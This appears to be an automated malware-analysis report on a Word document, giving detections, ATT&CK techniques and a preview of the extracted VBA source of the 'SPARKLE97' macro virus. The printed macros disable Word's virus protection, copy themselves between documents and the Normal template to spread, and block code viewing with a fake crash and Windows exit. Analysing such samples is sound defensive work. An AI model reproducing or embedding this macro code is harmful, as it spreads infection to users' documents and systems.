MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The macro code, specifically the 'Sparkle' subroutine, attempts to copy itself and associated user forms ('userform999', 'userform900') from the Normal template to the active document. This action is indicative of a macro-based malware designed for persistence or propagation. The ClamAV detections 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Sparkle-2' further support the malicious nature of the file.
Heuristics 2
-
ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Beauty-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16108 bytes |
SHA-256: 0ff9aac1a69629dda42ecd5605df0cb5e276c0e4c96aef6c9dd9b5b258d6dc85 |
|||
|
Detection
ClamAV:
Doc.Trojan.Sparkle-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "Sparkle"
Sub FileSave()
On Error GoTo Error
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Sparkle" Then
DocumentInstalled = True
End If
Next
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(J).Name = "Sparkle" Then
GlobalInstalled = True
End If
Next
If DocumentInstalled = False Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
With ActiveDocument
.BuiltInDocumentProperties(wdPropertyTitle) = "SPARKLE97"
.BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
.BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyCompany) = "Eifel Epidemic"
.BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus Was Made By Talon"
End With
End If
If GlobalInstalled = False Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
End If
Sparkle
Error:
End Sub
Sub Toolsmacro()
On Error GoTo Error
userform999.Show
Error:
End Sub
Sub Filetemplates()
On Error GoTo Error
userform900.Show
Error:
End Sub
Sub Sparkle()
On Error GoTo Error
If WeekDay(Now()) = 2 And Hour(Now()) = 9 Then
With ActiveDocument.Content
.Font.Animation = wdAnimationSparkleText
Application.StatusBar = True
StatusBar = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
Application.Caption = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
End With
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
Error:
End Sub
Sub ViewVbCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Tasks.ExitWindows
End Sub
Attribute VB_Name = "userform999"
Attribute VB_Base = "0{77DA0ACF-C32C-11D0-B4FA-444553540000}{77DA0AC9-C32C-11D0-B4FA-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ListBox2_Click()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Unload userform999
End Sub
Private Sub UserForm_Initialize()
ComboBox1.AddItem "Normal.dot(global template)"
End Sub
Private Sub CommandButton2_Click()
Unload userform999
End Sub
Private Sub CommandButton5_Click()
MsgBox "This program has performed an illegal operation and will shut down.
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.